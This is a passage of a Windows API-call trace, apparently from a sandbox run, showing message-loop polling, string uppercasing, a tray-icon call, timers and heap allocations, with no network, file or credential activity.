lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.449] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.449] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.449] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.449] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.449] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.449] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.449] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.449] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.450] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.450] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.450] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.450] PeekMessageW (in: lpMsg=0x8bf3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3ec) returned 0 [0245.450] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.450] CharUpperBuffW (in: lpsz="TRUE_HOMEDRIVE", cchLength=0xe | out: lpsz="TRUE_HOMEDRIVE") returned 0xe [0245.450] PeekMessageW (in: lpMsg=0x8bf2b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf2b4) returned 0 [0245.450] PeekMessageW (in: lpMsg=0x8bf2b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf2b4) returned 0 [0245.451] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.451] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.451] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.452] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.452] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.452] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.452] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0245.452] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.452] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.452] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.452] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.459] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.459] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.459] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.459] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.459] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.459] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.459] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.460] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.460] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.460] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.460] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.460] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.460] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.460] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.460] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.460] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.460] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.460] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.460] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.460] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.460] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.460] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.460] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.460] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.461] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.461] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.461] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.461] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.461] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.461] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.461] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.461] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.461] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.461] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.461] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.461] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.461] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.461] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.461] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.461] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.461] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.462] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.462] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.462] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.462] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.462] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.462] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.462] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.462] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0245.490] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0245.521] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0245.576] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0245.634] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0245.677] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0245.693] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0245.755] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0245.818] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0245.880] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0245.943] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0246.005] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0246.021] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0246.282] TranslateMessage (lpMsg=0x8bf4d4) returned 0 [0246.282] DispatchMessageW (lpMsg=0x8bf4d4) returned 0x0 [0246.282] Shell_NotifyIconW (dwMessage=0x1, lpData=0x8beb70) returned 1 [0246.513] KillTimer (hWnd=0x5014a, uIDEvent=0x1) returned 1 [0246.513] SetTimer (hWnd=0x5014a, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0246.513] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.513] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc218d8 [0246.513] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e2a8 [0246.513] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9ad8 [0246.513] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc219a8 [0246.513] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc219a8 | out: hHeap=0xbe0000) returned 1 [0246.513] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9da8 [0246.513] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc219a8 [0246.513] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc219a8 | out: hHeap=0xbe0000) returned 1 [0246.513] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9ad8 | out: hHeap=0xbe0000) returned 1 [0246.513] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9da8 | out: hHeap=0xbe0000) returned 1 [0246.513] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1e2a8 | out: hHeap=0xbe0000) returned 1 [0246.513] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc218d8 | out: hHeap=0xbe0000) returned 1 [0246.513] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.513] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc5d620 | out: hHeap=0xbe0000) returned 1 [0246.514] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.514] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc5d5e0 | out: hHeap=0xbe0000) returned 1 [0246.514] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.514] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc218d8 [0246.514] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e2a8 [0246.514] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9da8 [0246.514] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc219a8 [0246.514] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9ad8 [0246.514] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc219a8 | out: hHeap=0xbe0000) returned 1 [0246.514] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9ac0 [0246.514] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc219a8 [0246.514] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9dc0 [0246.514] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc219a8 | out: hHeap=0xbe0000) returned 1 [0246.514] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x42) returned 0xcea520 [0246.514] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc219a8 [0246.514] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21978 [0246.514] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x214) returned 0xc228f8 [0246.514] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x84) returned 0xc22b18 [0246.514] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa618 [0246.514] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9e20 [0246.514] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9e38 [0246.514] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9e50 [0246.514] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9e20 | out: hHeap=0xbe0000) returned 1 [0246.514] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc219c8 [0246.514] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9e20 [0246.514] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9e68 [0246.514] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9e80 [0246.514] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9e98 [0246.514] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9e68 | out: hHeap=0xbe0000) returned 1 [0246.514] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21998 [0246.514] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9e68 [0246.514] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9eb0 [0246.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9ec8 [0246.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9ee0 [0246.515] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9eb0 | out: hHeap=0xbe0000) returned 1 [0246.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc219b8 [0246.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9eb0 [0246.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9ef8 [0246.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9f10 [0246.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9f28 [0246.515] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9ef8 | out: hHeap=0xbe0000) returned 1 [0246.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc219d8 [0246.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9ef8 [0246.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9f40 [0246.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9f58 [0246.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9f70 [0246.515] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9f40 | out: hHeap=0xbe0000) returned 1 [0246.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc219e8 [0246.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9f40 [0246.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9f88 [0246.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9fa0 [0246.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9fb8 [0246.515] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9f88 | out: hHeap=0xbe0000) returned 1 [0246.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc219f8 [0246.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9f88 [0246.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9fd0 [0246.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9fe8 [0246.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa000 [0246.515] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9fd0 | out: hHeap=0xbe0000) returned 1 [0246.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21a08 [0246.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9fd0 [0246.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa018 [0246.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa030 [0246.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa048 [0246.516] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa018 | out: hHeap=0xbe0000) returned 1 [0246.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21a18 [0246.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa018 [0246.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa060 [0246.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa078 [0246.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa090 [0246.516] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa060 | out: hHeap=0xbe0000) returned 1 [0246.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21a28 [0246.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa060 [0246.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa0a8 [0246.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa0c0 [0246.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa0d8 [0246.516] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa0a8 | out: hHeap=0xbe0000) returned 1 [0246.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21a38 [0246.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa0a8 [0246.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa0f0 [0246.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa108 [0246.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa120 [0246.516] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa0f0 | out: hHeap=0xbe0000) returned 1 [0246.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21a48 [0246.516] 